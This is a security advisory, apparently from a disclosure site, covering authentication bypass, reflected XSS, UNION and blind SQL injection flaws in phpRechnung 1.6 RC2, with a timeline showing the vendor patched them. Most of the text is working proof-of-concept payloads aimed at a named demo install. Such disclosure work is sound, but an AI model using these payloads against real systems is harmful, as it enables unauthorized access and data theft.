Home News Advisories Tools

phpRechnung 1.6 RC2 multiple security vulnerabilities

There are multiple security vulnerabilities in phpRechnung 1.6 RC2 which allow an unauthorized user to take control of the software.

Software

Software Link: phpRechnung

Vulnerable Version: <= 1.6 RC2

Vendor Notification:

# 2010-11-13 # Bug 3108030 submitted

# 2010-12-07 # Vendor resolved issues

# 2010-12-08 # Vendor released phpRechnung version 1.6.1

# 2010-12-17 # Advisory released

Vulnerabilities

# Authentication Bypass # <= 1.6 RC2 # Patched

The issue is due to failure in "/login/loginf.php" to correctly sanitize user-supplied data in the "Username" and "Password" parameters.

Username: admin Password: 'or'1'='1'--

The following proof of concept is available :

data:text/html;charset=utf-8,<form id="Login" name="Login" action="http://www.loenshotel.de/demo/phpRechnung/login/loginf.php" method="post"><input name="Username" type="hidden" value="admin"><input type='password' name="Password" value="'or'1'='1"></form><script>window.document.forms[0].submit()</script>

# Reflected Cross-Site Scripting (XSS) # <= 1.6 RC2 # Patched

The issue is due to failure in numerous files to correctly sanitize user-supplied data. Most files are vulnerable in the "*ID", "Sort", "Order" and "page" parameters.

The following proof of concept is available :

http://www.loenshotel.de/demo/phpRechnung/user/info.php?userID="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/user/info.php?Order="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/user/info.php?Sort="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/user/info.php?page="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/user/edit.php?userID="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/user/edit.php?Order="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/user/edit.php?Sort="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/user/edit.php?page="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/user/delete.php?userID="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/user/delete.php?Order="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/user/delete.php?Sort="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/user/delete.php?page="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/user/new.php?Order="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/user/new.php?Sort="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/user/new.php?page="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/user/list.php?Order="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/user/list.php?Sort="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/user/search.php?Order="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/user/search.php?Sort="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/user/search.php?page="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/user/help.php?Order="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/user/help.php?Sort="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/user/help.php?page="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/message/info.php?messageID="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/message/info.php?Order="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/message/info.php?Sort="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/message/info.php?page="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/message/edit.php?messageID="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/message/edit.php?Order="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/message/edit.php?Sort="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/message/edit.php?page="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/message/delete.php?messageID="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/message/delete.php?Order="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/message/delete.php?Sort="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/message/delete.php?page="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/message/new.php?Order="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/message/new.php?Sort="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/message/new.php?page="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/message/list.php?Order="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/message/list.php?Sort="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/message/search.php?Order="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/message/search.php?Sort="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/message/search.php?page="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/message/help.php?Order="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/message/help.php?Sort="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/message/help.php?page="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/config/info_company.php?settingID="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/config/info_company.php?Order="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/config/info_company.php?Sort="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/config/info_company.php?page="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/config/info_pdf.php?settingID="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/config/info_pdf.php?Order="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/config/info_pdf.php?Sort="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/config/info_pdf.php?page="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/config/info.php?settingID="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/config/info.php?Order="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/config/info.php?Sort="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/config/info.php?page="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/config/edit.php?settingID="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/config/edit.php?Order="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/config/edit.php?Sort="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/config/edit.php?page="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/config/list.php?Order="><script>alert(document.cookie)</script><" http://www.loenshotel.de/demo/phpRechnung/config/list.php?Sort="><script>alert(document.cookie)</script><"

# SQL Injection # <= 1.6 RC2 # Patched

The issue is due to failure in numerous files to correctly sanitize user-supplied data. Most files are vulnerable in the "*ID" parameter(s).

The following proof of concept is available :

http://www.loenshotel.de/demo/phpRechnung/user/edit.php?userID=-1 union select 1,@@version,3,4,5,6,7,8-- http://www.loenshotel.de/demo/phpRechnung/user/info.php?userID=-1%20union%20select%201,@@version,3,4,5,6,7-- http://www.loenshotel.de/demo/phpRechnung/message/edit.php?messageID=-1 union select 1,@@version-- http://www.loenshotel.de/demo/phpRechnung/message/info.php?messageID=-1%20union%20select%201,@@version-- http://www.loenshotel.de/demo/phpRechnung/config/edit.php?settingID=-1 union select 1,2,@@version,4,5,6,7,8,9,0,1,2,3,4,5,6-- http://www.loenshotel.de/demo/phpRechnung/position/edit.php?posID=-1 union select 1,2,@@version,4,5,6,7,8-- http://www.loenshotel.de/demo/phpRechnung/position/info.php?posID=-1 union select 1,2,@@version,4,5,6,7,8,9,0-- http://www.loenshotel.de/demo/phpRechnung/invoice/posedit.php?tmpPosID=-1 union select 1,@@version,3,4,5,6,7,8,9,0,1,2-- http://www.loenshotel.de/demo/phpRechnung/invoice/info.php?invoiceID=-1 union select 1,@@version,3,4,5,6,7,8,9,0,1,2,3-- http://www.loenshotel.de/demo/phpRechnung/posgroup/info.php?posgroupID=-1 union select 1,@@version-- http://www.loenshotel.de/demo/phpRechnung/cashbook/info.php?cashbookID=-1 union select 1,2,3,4,@@version,6,7,8,9,0,1-- http://www.loenshotel.de/demo/phpRechnung/syslog/info.php?syslogID=-1 union select 1,2,@@version-- http://www.loenshotel.de/demo/phpRechnung/methodofpayment/info.php?methodpayID=-1 union select 1,@@version-- http://www.loenshotel.de/demo/phpRechnung/cashbook/info.php?cashbookID=-1 union select 1,2,3,4,@@version,6,7,8,9,0,1-- http://www.loenshotel.de/demo/phpRechnung/offer/info.php?offerID=-1 union select 1,2,3,4,@@version,6,7,8,9,0,1,2--

# Blind SQL Injection # <= 1.6 RC2 # Patched

The issue is due to failure in "/offer/print_pdf.php" to correctly sanitize user-supplied data in the "offerID" parameter.

The following proof of concept is available :

http://www.loenshotel.de/demo/phpRechnung/offer/print_pdf.php?myID=1&offerID=-1 union all select sleep(10),1,2,3,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2--

Reference

# OWASP: SQL Injection

# OWASP: Cross-Site Scripting

# OWASP: Authentication Bypass

Appendix

[TXT] phpRechnung 1.6 RC2 multiple security vulnerabilities

Copyright © IT Security Solutions.org